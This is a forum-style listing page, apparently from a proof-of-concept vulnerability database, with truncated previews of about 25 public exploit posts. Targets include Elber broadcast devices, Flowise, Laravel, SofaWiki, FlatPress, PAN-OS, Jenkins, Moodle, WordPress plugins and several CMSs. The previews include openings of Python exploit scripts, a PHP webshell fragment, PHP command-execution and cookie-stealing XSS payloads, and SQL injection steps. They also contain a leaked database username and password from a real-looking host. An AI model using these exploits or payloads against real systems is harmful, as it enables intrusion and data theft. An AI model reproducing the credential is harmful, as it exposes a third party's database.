
?day POC Vulnerability Database

A POC vulnerability database containing all CVEs, POCs and ?days published across the web in recent years. It can be connected to the ishack vulnerability scanner through its API. Some vulnerabilities are visible to members only.

  1. Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related co…

    • 0 replies
    • 15 views
  2. Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the re…

    • 0 replies
    • 16 views
  3. Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.999 Revision 1243 1.317 Revision 602 1.220 Revision 1250 1.220 Revision 1248_1249 1.220 Revision 597 1.217 Revision 1242 1.214 Revision 1023 1.193 Revision 924 1.175 Revision 873 1.166 Revision 550 Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as minimum sym…

    • 0 replies
    • 17 views
  4. Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.999 Revision 1243 1.317 Revision 602 1.220 Revision 1250 1.220 Revision 1248_1249 1.220 Revision 597 1.217 Revision 1242 1.214 Revision 1023 1.193 Revision 924 1.175 Revision 873 1.166 Revision 550 Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as min…

    • 0 replies
    • 15 views
  5. # Exploit Title: Flowise 1.6.5 - Authentication Bypass # Date: 17-April-2024 # Exploit Author: Maerifat Majeed # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise/releases # Version: 1.6.5 # Tested on: mac-os # CVE : CVE-2024-31621 The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability. The code snippet this.app.use((req, res, next) => { > if (req.url.includes('/api/v1/')) { > whitelistURLs.some((url) => req.url.includes(url)) ? > next() : basicAuthMiddleware(req, res, next) > } else next() > }) puts authenticat…

    • 0 replies
    • 16 views
  6. # Exploit Title: Laravel Framework 11 - Credential Leakage # Google Dork: N/A # Date: [2024-04-19] # Exploit Author: Huseein Amer # Vendor Homepage: [https://laravel.com/] # Software Link: N/A # Version: 8.* - 11.* (REQUIRED) # Tested on: [N/A] # CVE : CVE-2024-29291 Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 …

    • 0 replies
    • 17 views
  7. # Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 18.04.2024 # Vendor Homepage: https://www.sofawiki.com # Software Link: https://www.sofawiki.com/site/files/snapshot.zip # Tested Version: v3.9.2 (latest) # Tested on: MacOS import requests import random import sys import time def main(): if len(sys.argv) < 4: print("Usage: python exploit.py <base_url> <username> <password>") sys.exit(1) base_url, username, password = sys.argv[1:4] filename = f"{random.randint(10000, 99999)}.phtml" session = requests.Session() login_url = f"{base_url}/index.php" login_data = …

    • 0 replies
    • 17 views
  8. # Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution # Date: 2024-04-16 # Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/background-image-cropper/ # Version: 1.2 # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multip…

    • 0 replies
    • 16 views
  9. # Exploit Title: FlatPress v1.3 - Remote Command Execution # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 19.04.2024 # Vendor Homepage: https://www.flatpress.org # Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip # Tested Version: 1.3 (latest) # Tested on: MacOS import requests import time import random import string def random_string(length=5): """Generates a random string.""" letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def login_and_upload(base_url, username, password): filename = random_string() + ".php" login_url = f"http://{base_url}/login.php" upload_url…

    • 0 replies
    • 16 views
  10. # Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation # Date: 21 Apr 2024 # Exploit Author: Kr0ff # Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400 # Software Link: - # Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 # PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1 # PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1 # Tested on: Debian # CVE : CVE-2024-3400 #!/usr/bin/env python3 import sys try: …

    • 0 replies
    • 18 views
  11. # Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated) # Date: 2023-08-14 # Exploit Author: V. B. # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/ # Version: OpenClinic GA 5.247.01 # Tested on: Windows 10, Windows 11 # CVE: CVE-2023-40279 # Details An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories. # Proof of Concept (POC) Steps to Reproduce: - Crafting the Mali…

    • 0 replies
    • 17 views
  12. # Exploit Title: Jenkins 2.441 - Local File Inclusion # Date: 14/04/2024 # Exploit Author: Matisse Beckandt (Backendt) # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip # Version: 2.441 # Tested on: Debian 12 (Bookworm) # CVE: CVE-2024-23897 from argparse import ArgumentParser from requests import Session, post, exceptions from threading import Thread from uuid import uuid4 from time import sleep from re import findall class Exploit(Thread): def __init__(self, url: str, identifier: str): Thread.__init__(self) self.daemon = True self.url = url self.params = {"remoting": "…

    • 0 replies
    • 23 views
  13. # Exploit Title: OpenClinic GA 5.247.01 - Information Disclosure # Date: 2023-08-14 # Exploit Author: VB # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/ # Version: OpenClinic GA 5.247.01 # Tested on: Windows 10, Windows 11 # CVE: CVE-2023-40278 # Details An Information Disclosure vulnerability was discovered in the printAppointmentPdf.jsp component of OpenClinic GA 5.247.01. The issue arises due to improper handling of error messages in response to manipulated input, allowing an attacker to deduce the existence of specific appointments. # Proof of Concept (POC) Steps to Reproduce: - Access …

    • 0 replies
    • 15 views
  14. # Exploit Title: djangorestframework-simplejwt 5.3.1 - Information Disclosure # Date: 26/01/2024 # Exploit Author: Dhrumil Mistry (dmdhrumilmistry) # Vendor Homepage: https://github.com/jazzband/djangorestframework-simplejwt/ # Software Link:https://github.com/jazzband/djangorestframework-simplejwt/releases/tag/v5.3.1 # Version: <= 5.3.1 # Tested on: MacOS # CVE : CVE-2024-22513 # The version of djangorestframework-simplejwt up to 5.3.1 is vulnerable. # This vulnerability has the potential to cause various security issues, # including Business Object Level Authorization (BOLA), Business Function # Level Authorization (BFLA), Information Disclosure, etc. The vulnerabil…

    • 0 replies
    • 18 views
  15. #!/usr/bin/env python3 # Exploit Title: Pre-auth RCE on Compuware iStrobe Web # Date: 01-08-2023 # Exploit Author: trancap # Vendor Homepage: https://www.bmc.com/ # Version: BMC Compuware iStrobe Web - 20.13 # Tested on: zOS# CVE : CVE-2023-40304 # To exploit this vulnerability you'll need "Guest access" enabled. The vulnerability is quite simple and impacts a web upload form, allowing a path traversal and an arbitrary file upload (.jsp files) # The vulnerable parameter of the form is "fileName". Using the form, one can upload a webshell (content of the webshell in the "topicText" parameter).# I contacted the vendor but he didn't consider this a vulnerability because of …

    • 0 replies
    • 19 views
  16. # Exploit Title: Online Fire Reporting System SQL Injection Authentication Bypass # Date: 02/10/2024 # Exploit Author: Diyar Saadi # Vendor Homepage: https://phpgurukul.com/online-fire-reporting-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/projects/Online-Fire-Reporting-System-using-PHP.zip # Version: V 1.2 # Tested on: Windows 11 + XAMPP 8.0.30 ## Exploit Description ## SQL Injection Vulnerability in ofrs/admin/index.php : The SQL injection vulnerability in the ofrs/admin/index.php script arises from insecure handling of user input during the login process. ## Steps to reproduce ## 1- Open the admin panel page by following URL : http://localhos…

    • 0 replies
    • 16 views
  17. # Exploit Title: Stock Management System v1.0 - Unauthenticated SQL Injection # Date: February 6, 2024 # Exploit Author: Josué Mier (aka blu3ming) Security Researcher & Penetration Tester @wizlynx group # Vendor Homepage: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/sms.zip # Tested on: Linux and Windows, XAMPP # CVE-2023-51951 # Vendor: oretnom23 # Version: v1.0 # Exploit Description: # The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0, allowing remote attackers to dump the…

    • 0 replies
    • 18 views
  18. # Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting # Date: 2024-01-03 # Exploit Author: Eren Sen # Vendor: SAVSOFT QUIZ # Vendor Homepage: https://savsoftquiz.com # Software Link: https://savsoftquiz.com/web/index.php/online-demo/ # Version: < 6.0 # CVE-ID: N/A # Tested on: Kali Linux / Windows 10 # Vulnerabilities Discovered Date : 2024/01/03 # Persistent Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: POST # Vulnerable Parameter: quiz_name # Proof of Concepts: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13 # HTTP Request: POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/…

    • 0 replies
    • 16 views
  19. # Exploit Title: WBCE CMS Version : 1.6.1 Remote Command Execution # Date: 30/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://wbce-cms.org/ # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip # Version: 1.6.1 # Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS ## POC: 1 ) Login with admin cred and click Add-ons 2 ) Click on Language > Install Language > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php 3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php 4 ) You will be see id command …

    • 0 replies
    • 17 views
  20. # Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS) # Date: 12 April 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.1.1 # Proof Of Concept: 1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]". # PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w # Vulnerable Property at Request: videoFields[post_type] # Payload: <script>alert(document.cookie)</script> # Request: POST /wp-admin/options.php HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a23…

    • 0 replies
    • 21 views
  21. # Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0 # Date: 15.11.2023 # Exploit Author: young pope # Vendor Homepage: https://github.com/WBCE/WBCE_CMS # Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip # Version: 1.6.0 # Tested on: Kali linux # CVE : CVE-2023-39796 There is an sql injection vulnerability in *miniform* module which is a default module installed in the *WBCE* cms. It is an unauthenticated sqli so anyone could access it and takeover the whole database. In file /modules/miniform/ajax_delete_message.php there is no authentication check. On line |40| in this file, there is a |DELETE| query that is vulnerable, an…

    • 0 replies
    • 26 views
  22. # Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export # Date: 16/01/2024 # Exploit Author: Kamil Breński # Vendor Homepage: https://www.prusa3d.com # Software Link: https://github.com/prusa3d/PrusaSlicer # Version: PrusaSlicer up to and including version 2.6.1 # Tested on: Windows and Linux # CVE: CVE-2023-47268 ========================================================================================== 1.) 3mf Metadata extension ========================================================================================== PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this …

    • 0 replies
    • 19 views
  23. # Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter # Google Dork: # Date: 04/11/2023 # Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx) # Vendor Homepage: https://moodle.org/ # Software Link: # Version: 3.10.1 # Tested on: Linux # CVE : CVE-2021-36393 import requests import string from termcolor import colored # Request details URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification" HEADERS = { "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", …

    • 0 replies
    • 13 views
  24. # Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution # Date: 27/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS ##POC: 1 ) Login with admin cred and click settings 2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?> 3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1 Host: demos5.softaculous.com Cookie: _ga_YYDPZ3NXQQ=GS1.…

    • 0 replies
    • 13 views
  25. # Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS) # Date: 22 March 2024 # Exploit Author: Erdemstar # Vendor: https://wordpress.com/ # Version: 1.32 # Proof Of Concept: 1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID". # PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns # Vulnerable Properties name: name, playlist_id # Payload: "><script>alert(document.cookie)</script> # Request: POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2 Host: erdemstar.local Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e9…

    • 0 replies
    • 12 views